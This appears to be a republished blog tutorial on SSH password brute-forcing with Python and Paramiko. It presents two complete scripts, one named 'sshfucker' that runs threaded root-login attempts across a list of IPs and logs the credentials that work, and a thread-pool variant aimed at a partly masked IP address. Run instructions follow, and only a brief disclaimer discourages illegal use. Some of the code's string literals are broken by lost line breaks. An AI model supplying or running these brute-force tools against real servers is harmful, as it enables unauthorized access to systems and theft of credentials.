BestHub
Sign in
Information Security 7 min read

How to Perform SSH Brute‑Force Attacks with Python and Paramiko

This tutorial explains the concept of password‑brute‑force, introduces the open‑source sshfucker library and a custom multithreaded Python script that uses Paramiko to enumerate SSH credentials from a dictionary, and provides step‑by‑step code examples and usage instructions while warning against illegal use.

Python Crawling & Data Mining
Python Crawling & Data Mining
Python Crawling & Data Mining
How to Perform SSH Brute‑Force Attacks with Python and Paramiko

Brute‑force is a password‑cracking technique that repeatedly tries possible passwords by enumeration.

This article demonstrates how to use Python for SSH brute‑force attacks. It first presents the open‑source sshfucker tool, which wraps the Paramiko library to create SSH client connections and launch multithreaded password trials. Paramiko is a pure‑Python implementation of the SSH2 protocol, supporting client and server modes, SFTP, and all major cipher and hash algorithms. It is popular in Python automation and security tooling.

Install Paramiko: pip install paramiko Example sshfucker script (≈70 lines):

#!/usr/bin/python python
# -*- coding: utf-8 -*-

import paramiko, threading, sys, time, os

class SSHThread(threading.Thread):
    def __init__(self, ip, port, timeout, dic, LogFile):
        threading.Thread.__init__(self)
        self.ip = ip
        self.port = port
        self.dict = dic
        self.timeout = timeout
        self.LogFile = LogFile

    def run(self):
        print("Start try ssh => %s" % self.ip)
        username = "root"
        try:
            password = open(self.dict).read().split('
')
        except:
            print("Open dict file `%s` error" % self.dict)
            exit(1)
        for pwd in password:
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(self.ip, self.port, username, pwd, timeout=self.timeout)
                print("
IP => %s, Login %s => %s 
" % (self.ip, username, pwd))
                open(self.LogFile, "a").write("[ %s ] IP => %s, port => %d, %s => %s 
" % (
                    time.asctime(time.localtime(time.time())), self.ip, self.port, username, pwd))
                break
            except:
                print("IP => %s, Error %s => %s" % (self.ip, username, pwd))
                pass

def ViolenceSSH(ip, port, timeout, dic, LogFile):
    ssh_scan = SSHThread(ip, port, timeout, dic, LogFile)
    ssh_scan.start()

def main(ipFile, dic, log):
    if ipFile == "-h":
        help()
    try:
        ipText = open(ipFile).read().split('
')
        for ip in ipText:
            if ip != '':
                time.sleep(0.5)
                threading.Thread(target=ViolenceSSH, args=(ip, 22, 1, dic, log,)).start()
    except:
        print("Open IP list file `%s` error" % ipFile)
        exit(1)

def help():
    print("python ssh.scan.py :
        修改dict下的ip文件,password按需求修改,然后执行脚本。 
")
    exit(1)

if __name__ == '__main__':
    fpath = os.path.dirname(os.path.abspath('__file__'))
    ipFile = sys.argv[1] if len(sys.argv) > 1 else fpath + "/dict/ip"
    dic = sys.argv[2] if len(sys.argv) > 2 else fpath + "/dict/password"
    log = sys.argv[3] if len(sys.argv) > 3 else fpath + "/log/sshd"
    try:
        os.system("clear")
        main(ipFile, dic, log)
    except KeyboardInterrupt:
        exit(1)

A more concise custom script using ThreadPoolExecutor:

import sys
import paramiko
import threading
from concurrent.futures import ThreadPoolExecutor

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
is_find = False

def SshCheck(password):
    try:
        ssh.connect("119.23.xx.xx", 22, 'root', password, timeout=1.5)
        stdin, stdout, stderr = ssh.exec_command('df')
        result = stdout.read()
        if result:
            sys.stdout.write('[OK]\t' + password + '
')
            global is_find
            is_find = True
            exit()
    except Exception as e:
        print(e, "失败!!!")
    finally:
        ssh.close()

filedata = open("pwds.txt", "r")

def run():
    pool = ThreadPoolExecutor(3)
    while True:
        global is_find
        if is_find:
            break
        line = filedata.readline()
        if not line:
            break
        line = line.strip("
")
        pool.submit(SshCheck, line)

run()

Run the script with: python sshfucker.py The password file (e.g., pwds.txt) should contain a list of candidate passwords, one per line.

Disclaimer: This material is provided for educational and research purposes only. Do not use it for illegal activities; unauthorized access to systems is prohibited and may result in legal consequences.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

PythonAutomationSecuritySSHParamikobrute force
Python Crawling & Data Mining
Written by

Python Crawling & Data Mining

Life's short, I code in Python. This channel shares Python web crawling, data mining, analysis, processing, visualization, automated testing, DevOps, big data, AI, cloud computing, machine learning tools, resources, news, technical articles, tutorial videos and learning materials. Join us!

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment